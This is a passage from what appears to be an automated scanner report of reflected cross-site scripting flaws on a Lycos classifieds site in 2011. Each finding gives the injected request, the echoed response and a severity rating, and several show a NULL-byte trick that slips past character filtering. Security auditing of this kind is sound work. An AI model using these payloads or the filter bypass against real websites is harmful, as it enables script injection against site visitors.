<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/sale-collectiblec9e51"><script>alert(1)</script>ece04b856b8/?mobile=1" rel="nofollow"> ...[SNIP]...
1.96. http://classifieds.lycos.com/sale-collectible/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://classifieds.lycos.com
Path:
/sale-collectible/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 959b6"><script>alert(1)</script>55cec2650f8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sale-collectible/?959b6"><script>alert(1)</script>55cec2650f8=1 HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 15:06:42 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:06:42 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 40196
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/sale-collectible/?959b6"><script>alert(1)</script>55cec2650f8=1&mobile=1" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b301e"><script>alert(1)</script>2d184bf1887 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sale-electronicsb301e"><script>alert(1)</script>2d184bf1887/ HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 404 Not Found Date: Mon, 07 Feb 2011 15:07:36 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:07:36 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17703
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/sale-electronicsb301e"><script>alert(1)</script>2d184bf1887/?mobile=1" rel="nofollow"> ...[SNIP]...
1.98. http://classifieds.lycos.com/sale-electronics/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://classifieds.lycos.com
Path:
/sale-electronics/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6eb76"><script>alert(1)</script>3f65cb4ffd7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sale-electronics/?6eb76"><script>alert(1)</script>3f65cb4ffd7=1 HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 15:06:54 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:06:54 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 50622
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/sale-electronics/?6eb76"><script>alert(1)</script>3f65cb4ffd7=1&mobile=1" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3731a"><script>alert(1)</script>3d3a5d53bc0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sale-entertainment3731a"><script>alert(1)</script>3d3a5d53bc0/ HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 404 Not Found Date: Mon, 07 Feb 2011 15:53:28 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:53:28 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17709
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/sale-entertainment3731a"><script>alert(1)</script>3d3a5d53bc0/?mobile=1" rel="nofollow"> ...[SNIP]...
1.100. http://classifieds.lycos.com/sale-entertainment/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://classifieds.lycos.com
Path:
/sale-entertainment/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d0491"><script>alert(1)</script>19881e9aaba was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sale-entertainment/?d0491"><script>alert(1)</script>19881e9aaba=1 HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 15:53:20 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:53:20 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 38306
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/sale-entertainment/?d0491"><script>alert(1)</script>19881e9aaba=1&mobile=1" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b3718"><script>alert(1)</script>7a2e16f3111 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sale-freeb3718"><script>alert(1)</script>7a2e16f3111/ HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 404 Not Found Date: Mon, 07 Feb 2011 15:07:43 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:07:43 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17682
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/sale-freeb3718"><script>alert(1)</script>7a2e16f3111/?mobile=1" rel="nofollow"> ...[SNIP]...
1.102. http://classifieds.lycos.com/sale-free/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://classifieds.lycos.com
Path:
/sale-free/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 30dd1"><script>alert(1)</script>6bbefb1baf7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sale-free/?30dd1"><script>alert(1)</script>6bbefb1baf7=1 HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 15:07:10 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:07:10 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 34736
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/sale-free/?30dd1"><script>alert(1)</script>6bbefb1baf7=1&mobile=1" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3add9"><script>alert(1)</script>643e66701bc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sale-furniture-bed3add9"><script>alert(1)</script>643e66701bc/pillow-top-mattress-and-spring-we-are-moving-to-a-smaller-home-2416139805 HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 404 Not Found Date: Mon, 07 Feb 2011 15:04:28 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:04:28 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17928
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/sale-furniture-bed3add9"><script>alert(1)</script>643e66701bc/pillow-top-mattress-and-spring-we-are-moving-to-a-smaller-home-2416139805?mobile=1" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00cf480"><script>alert(1)</script>5e3d57aa082 was submitted in the REST URL parameter 2. This input was echoed as cf480"><script>alert(1)</script>5e3d57aa082 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /sale-furniture-bed/pillow-top-mattress-and-spring-we-are-moving-to-a-smaller-home-2416139805%00cf480"><script>alert(1)</script>5e3d57aa082 HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 404 Not Found Date: Mon, 07 Feb 2011 15:05:00 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:05:00 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 25740
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/sale-furniture-bed/pillow-top-mattress-and-spring-we-are-moving-to-a-smaller-home-2416139805%00cf480"><script>alert(1)</script>5e3d57aa082?mobile=1" rel="nofollow"> ...[SNIP]...
1.105. http://classifieds.lycos.com/sale-furniture-bed/pillow-top-mattress-and-spring-we-are-moving-to-a-smaller-home-2416139805 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72e2b"><script>alert(1)</script>f3ffee32f1e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sale-furniture-bed/pillow-top-mattress-and-spring-we-are-moving-to-a-smaller-home-2416139805?72e2b"><script>alert(1)</script>f3ffee32f1e=1 HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 15:04:09 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:04:09 GMT; path=/ Set-Cookie: classifieds[lastpage][0][category]=sale%2Ffurniture%2Fbed; path=/ Set-Cookie: classifieds[lastpage][0][name]=Beds+%26+Bedroom+Sets; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 23862
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/sale-furniture-bed/pillow-top-mattress-and-spring-we-are-moving-to-a-smaller-home-2416139805?72e2b"><script>alert(1)</script>f3ffee32f1e=1&mobile=1" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 331be"><script>alert(1)</script>8eab472e6d8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sale-furniture-sofa331be"><script>alert(1)</script>8eab472e6d8/sofas-furnishings-other-2416111056 HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 404 Not Found Date: Mon, 07 Feb 2011 15:04:25 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:04:25 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17814
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/sale-furniture-sofa331be"><script>alert(1)</script>8eab472e6d8/sofas-furnishings-other-2416111056?mobile=1" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %004e3ff"><script>alert(1)</script>38fe35f9b8a was submitted in the REST URL parameter 2. This input was echoed as 4e3ff"><script>alert(1)</script>38fe35f9b8a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /sale-furniture-sofa/sofas-furnishings-other-2416111056%004e3ff"><script>alert(1)</script>38fe35f9b8a HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 404 Not Found Date: Mon, 07 Feb 2011 15:04:57 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:04:57 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 25702
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/sale-furniture-sofa/sofas-furnishings-other-2416111056%004e3ff"><script>alert(1)</script>38fe35f9b8a?mobile=1" rel="nofollow"> ...[SNIP]...
1.108. http://classifieds.lycos.com/sale-furniture-sofa/sofas-furnishings-other-2416111056 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2b58"><script>alert(1)</script>7ef5e310c7a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sale-furniture-sofa/sofas-furnishings-other-2416111056?b2b58"><script>alert(1)</script>7ef5e310c7a=1 HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 15:04:08 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:04:08 GMT; path=/ Set-Cookie: classifieds[lastpage][0][category]=sale%2Ffurniture%2Fsofa; path=/ Set-Cookie: classifieds[lastpage][0][name]=Sofas; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 13766
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/sale-furniture-sofa/sofas-furnishings-other-2416111056?b2b58"><script>alert(1)</script>7ef5e310c7a=1&mobile=1" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ce54"><script>alert(1)</script>88b33ce779f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sale-furniture-table3ce54"><script>alert(1)</script>88b33ce779f/dining-table-dining-and-kitchen-2416111088 HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 404 Not Found Date: Mon, 07 Feb 2011 15:04:10 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:04:10 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17841
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/sale-furniture-table3ce54"><script>alert(1)</script>88b33ce779f/dining-table-dining-and-kitchen-2416111088?mobile=1" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00e35a4"><script>alert(1)</script>b00d785867 was submitted in the REST URL parameter 2. This input was echoed as e35a4"><script>alert(1)</script>b00d785867 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /sale-furniture-table/dining-table-dining-and-kitchen-2416111088%00e35a4"><script>alert(1)</script>b00d785867 HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 404 Not Found Date: Mon, 07 Feb 2011 15:04:52 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:04:52 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 25710
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/sale-furniture-table/dining-table-dining-and-kitchen-2416111088%00e35a4"><script>alert(1)</script>b00d785867?mobile=1" rel="nofollow"> ...[SNIP]...
1.111. http://classifieds.lycos.com/sale-furniture-table/dining-table-dining-and-kitchen-2416111088 [name of an arbitrarily supplied request parameter]previousnext
